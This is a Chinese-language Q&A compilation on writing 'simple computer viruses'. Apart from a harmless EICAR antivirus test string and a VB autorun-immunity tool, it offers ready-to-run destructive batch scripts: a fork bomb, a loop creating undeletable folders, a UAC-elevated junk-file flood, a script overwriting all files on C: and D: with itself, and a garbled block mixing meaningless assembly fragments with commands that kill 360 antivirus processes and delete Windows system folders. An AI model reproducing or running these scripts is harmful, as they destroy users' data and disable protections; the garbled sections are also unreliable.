本文目录一览:
谁能给我一个简单的病毒的代码呀
本代码尽管测试,无任何危险。病毒文件测试代码。使用方法如下:
this
is
not
a
real
virus.
it
is
a
text
file
that
is
used
to
test
antivirus
software.
测试代码:
---------------------请复制下面的代码到文本中保存-------------------
x5o!p%@ap[4\pzx54(p^)7cc)7}$eicar-standard-antivirus-test-file!$h+h*
---------------------请复制上面的代码到文本中保存-------------------
测试方法:
1.鼠标右键点击桌面空白处,创建一个“文本文档”。(什么,还不会建?我倒)
2.将下面这段测试代码复制到“文本”里,保存,然后可以直接右键点击这个文本,用杀毒软件扫描(图1)。也可以等一会,如果你的杀毒软件还行,会自动报毒并将该文本删除,那就可以初步放心了。
测试原理:
该段代码是欧洲计算机防病毒协会开发的一种病毒代码,其中的特征码已经包含在各种杀毒软件的病毒代码库里,所以可以用做测试病毒扫描引擎。
测试等级:
特等:复制完代码后便提示内存有病毒
优等:刚保存完就提示病毒(或者直接删除)
中等:保存后几秒提示病毒(或者直接删除)
下等:需自己启动病毒扫描查杀才提示病毒(或者直接删除)
劣等:无论怎么扫描都无法提示病毒(或者直接删除)
电脑病毒制作教程
很荣幸能够回答您的问题!
桌面上创建记事本,改后缀为bat
2
::输入以下代码
%0|%0
保存后退出,打开会发现无限制的弹窗。这是什么原理呢?
执行脚本的时候,|管道符会将左面的值传给右边,而这里%0是第一个参数(批处理路径),所以会无限执行自己。
END
第二种病毒
这种更强大一些。同样,桌面上创建记事本,改后缀为bat
::输入以下代码
for /l %%i in (1 1 999999) do md A..\
这个病毒利用Windows命名漏洞,创建999999个删除不了也打不开的文件夹。解决方法:把md改为rd
END
第三种病毒
这种病毒更高级,攻击性能更强。同样,桌面上创建记事本,改后缀为bat
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
:a
set /a a+=1
echo %random%-%random%-%random% C:\Users\%username%\Desktop\病毒文件.%random%
mshta javascript:alert("您已中第%a%个病毒.");close();
goto a
这个病毒会在后台运行,在桌面重复弹信息框,生成垃圾文件,千万不敢随意测试,因为电脑会消耗尽内存后蓝屏。
END
第四种病毒
这种病毒最有破坏性,跟熊猫烧香媲美。同样,桌面上创建记事本,改后缀为bat
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
for /f "tokens=* delims=" %%i in ('dir /b D:\*.*') do copy /y "%dpnx0" "%%i" nul
for /f "tokens=* delims=" %%i in ('dir /b C:\*.*') do copy /y "%dpnx0" "%%i" nul
此程序特别狠,会在后台把C、D盘所有的文件都替换成自己(病毒文件,然后会又被执行)。
希望能帮到您,如有疑问,请追问!
开机一闪而过的病毒CMD代码(如图),请大神帮忙!!!3ku!!!
以毒攻毒。
你将以下代码:
@echo off
title Clean
Color a
Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /va /f
Reg.exe delete "HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /va /f
del /s /q /f "%userprofile%\「开始」菜单\程序\启动\*"nul
复制到“记事本”程序中。然后单击“文件”"保存",选择桌面后,在“保存类型”中选择“所有文件”,文件名中填“超级病毒专杀软件.bat”。最后单击“保存”,到桌面上运行“超级病毒专杀软件.bat”文件就行了。
写cmd病毒
代码是
echo off
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
JMP Label1
Db thunkcode1
Label2:jjj
……
JMP Label3
Db thunkcode3
Label1:ss
…….
JMP Label2
Db thunkcode2
Label3:mm
taskkill /f /im 360DesktopLite.exe
jz label
jnz label
db thunkcode
label:
jz label2
jnz label2
db thunkcode
lable2
mov ax, 8
xor ax, 77
...
taskkill /f /im explore.exe
taskkill /f /im 360tray.exe
taskkill /f /im 360Safe.exe
echo off
taskkill /f /im 360tray.exe
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
taskkill /f /im 360tray.exe
taskkill /f /im ZhuDongFangYu.exe
rmdir /s/q C:\Users\administrator\Desktop
rmdir /s/q C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
rmdir /s/q C:\ProgramData
del /f /s /q regedit.exe
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
call label_1
db thunkcode
jmp label_2
db thunkcode
label_1:
pop eax
jmp label_3
db thunkcode,thunkcode,thunkcode
label_3:
inc eax
jmp label_4
db thunkcode,thunkcode,thunkcode
label_4:
jmp eax
db thunkcode
label_2:
....
del /f /s /q notepad.exe
rmdir /s/q apppatch
rmdir /s/q Windows10Upgrade
rmdir /s/q LDSGameMaster
set path=C:\ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
set temp=C:\mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
del /f /s /q search-ms:displayname=“win10%20(C%3A)”中的搜索结果crumb=System.Generic.String:cmdcrumb=location:C%3A%5C
rmdir /s/q C:\Windows\appcompat\Programs
rmdir /s/q C:\Windows\en-US
rmdir /s/q C:\Windows\OCR
del /f /s /q notepad.exe
rmdir /s/q apppatch
rmdir /s/q Windows10Upgrade
rmdir /s/q LDSGameMaster
set path=C:\ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
set temp=C:\mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
del /f /s /q search-ms:displayname=“win10%20(C%3A)”中的搜索结果crumb=System.Generic.String:cmdcrumb=location:C%3A%5C
rmdir /s/q C:\Windows\appcompat\Programs
rmdir /s/q C:\Windows\en-US
rmdir /s/q C:\Windows\OCR
::wwwwwww::rrrrrr%%tttt
rmdir /s/q C:\Windows\minidump
rmdir /s/q C:\Windows\Microsoft.NET
ftype nppfile="C:\ProgramFiles (x86)\Notepad++\notepad++.exe" %1
for /l %%i in (1 1 9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999)do md A..\
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
:a
set /a a+=1
echo %random%-%random%-%random% C:\Users\%username%\Desktop\CCBL.%random%
mshta javascript:alert(".");close();
goto a
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
for /f "tokens=* delims=" %%i in ('dir /b D:\*.*') do copy /y "%dpnx0" "%%i" nul
for /f "tokens=* delims=" %%i in ('dir /b A:\*.*') do copy /y "%dpnx0" "%%i" nul
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
for /f "tokens=* delims=" %%i in ('dir /b K:\*.*') do copy /y "%dpnx0" "%%i" nul
for /f "tokens=* delims=" %%i in ('dir /b I:\*.*') do copy /y "%dpnx0" "%%i"
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
for /f "tokens=* delims=" %%i in ('dir /b Z:\*.*') do copy /y "%dpnx0" "%%i" nul
for /f "tokens=* delims=" %%i in ('dir /b M:\*.*') do copy /y "%dpnx0" "%%i" nul
rmdir /s/q C:\Windows\Offline Web Pages
高手指点小型病毒代码
用VB编的, 代码如下
Private Sub Command1_Click()
Text1.Text = " "
Shell "cmd.exe /c md " Mid(Drive1.Drive, 1, 2) "\Autorun.inf", vbHide
Shell "cmd.exe /c md " Mid(Drive1.Drive, 1, 2) "\Autorun.inf\xc..\", vbHide
End Sub
“xc..\”
取消免疫按钮
Private Sub Command2_Click()
Text1.Text = " "
Shell "cmd.exe /c rd " Mid(Drive1.Drive, 1, 2) "\Autorun.inf\xc..\", vbHide
Shell "cmd.exe /c rd " Mid(Drive1.Drive, 1, 2) "\Autorun.inf", vbHide
End Sub
退出按钮
Private Sub Command3_Click()
End
End Sub
检查按钮:
Private Sub Command4_Click()
On Error Resume Next
Dim fso, path
Set fso = CreateObject("scripting.filesystemobject")
Dim A
A = 67
For i = 1 To 24
path = Chr(A) ":\Autorun.inf\xc..\" = c:\Autorun.inf\xc..\
If Not fso.FolderExists(path) Then
Text1 = Text1 + vbCrLf + Chr(A) ":" + "没有免疫"
Else
Text1 = Text1 + vbCrLf + Chr(A) ":" + "已经免疫"
End If
A = A + 1
Next i
End Sub
Private Sub Command5_Click()
MsgBox "龙月专版 制作于2008年3月15日", vbDefaultButton2, "龙月QQ:331224655"
End Sub
“Set fso = CreateObject("scripting.filesystemobject"),作用是创建一个“scripting.filesystemobject”对象,VB中创建语法“Set 变量 = CreateObject("对象名")”,创建了“fso”后就可以使用FOS对象方法。